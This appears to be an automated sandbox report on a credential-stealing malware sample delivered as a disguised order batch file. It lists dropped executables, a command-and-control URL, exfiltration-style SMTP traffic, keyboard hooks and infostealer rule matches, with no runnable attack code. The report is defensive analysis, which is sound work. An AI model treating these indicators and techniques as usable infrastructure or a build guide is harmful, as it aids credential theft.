Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 00987394h	14_2_00987108
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 009878DCh	14_2_0098767A
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	14_2_00987E60
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	14_2_00987E5F
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	14_2_00987FBC
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 4x nop then jmp 065EBCBDh	20_2_065EBA40

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://gxe0.com/yak/233_Wisrysxlfss

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02E5E4B8 InternetCheckConnectionA,

4_2_02E5E4B8

Source: global traffic

TCP traffic: 192.168.2.10:49749 -> 51.195.88.199:587

Source: Joe Sandbox View	IP Address: 198.252.105.91 198.252.105.91
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49713 -> 198.252.105.91:443

Source: global traffic

TCP traffic: 192.168.2.10:49749 -> 51.195.88.199:587

Source: global traffic	HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: gxe0.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: s82.gocheapweb.com

Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000010.00000002.1551553255.0000000003098000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839347953.00000000066FA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839519274.0000000006710000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839347953.00000000066FA000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3839519274.0000000006710000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002CFA000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s82.gocheapweb.com
Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1555969400.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: x.exe, x.exe, 00000004.00000002.1532108594.000000002215C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1551725897.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1474717040.0000000002969000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330164805.000000000296A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1533707068.00000000224BF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020CA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D24000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1330431133.000000007F920000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1532108594.00000000220FC000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000C.00000000.1460918263.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001A.00000002.1609735089.0000000002FA2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001C.00000000.1577974384.0000000000416000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.pmail.com
Source: neworigin.exe, 0000000D.00000002.1726699852.0000000006707000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834898990.0000000005576000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: neworigin.exe, 0000000D.00000002.1726699852.0000000006707000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1598666321.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.1624352397.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.000000000301E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834898990.0000000005576000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3838990479.00000000066E6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3834255661.0000000005550000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3781994607.0000000001036000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3840124284.000000000672F000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3790934046.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: neworigin.exe, 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000010.00000002.1555969400.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000000.1467200681.0000000000A62000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000001D.00000002.3790934046.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: neworigin.exe, 0000000D.00000002.1624352397.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000010.00000002.1555969400.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: x.exe, 00000004.00000002.1464571050.0000000000696000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/
Source: x.exe, 00000004.00000002.1522045362.0000000020DAD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysx
Source: x.exe, 00000004.00000002.1522045362.0000000020DC3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1522045362.0000000020D98000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1464571050.000000000067A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
Source: x.exe, 00000004.00000002.1464571050.000000000067A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_WisrysxlfsseV
Source: x.exe, 00000004.00000002.1464571050.000000000062E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com:443/yak/233_Wisrysxlfss
Source: powershell.exe, 00000010.00000002.1607520049.0000000005C0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: x.exe, 00000004.00000003.1422946376.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1537113569.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1422946376.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1424649054.000000007ED80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49797 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe

Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.0.neworigin.exe.a60000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

.NET source code contains very large strings

Source: server_BTC.exe.12.dr, opqcmgIPmeabY.cs	Long String: Length: 17605
Source: TrojanAIbot.exe.14.dr, opqcmgIPmeabY.cs	Long String: Length: 17605

Found large BAT file

Source: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat

Static file information: 1393123

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E58670 NtUnmapViewOfSection,	4_2_02E58670
